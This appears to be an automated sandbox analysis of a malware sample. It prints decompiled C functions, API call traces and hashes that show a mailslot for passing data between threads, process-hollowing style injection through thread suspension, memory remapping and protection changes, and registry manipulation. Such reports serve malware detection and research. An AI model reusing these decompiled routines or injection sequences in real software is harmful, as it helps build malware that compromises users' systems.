  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
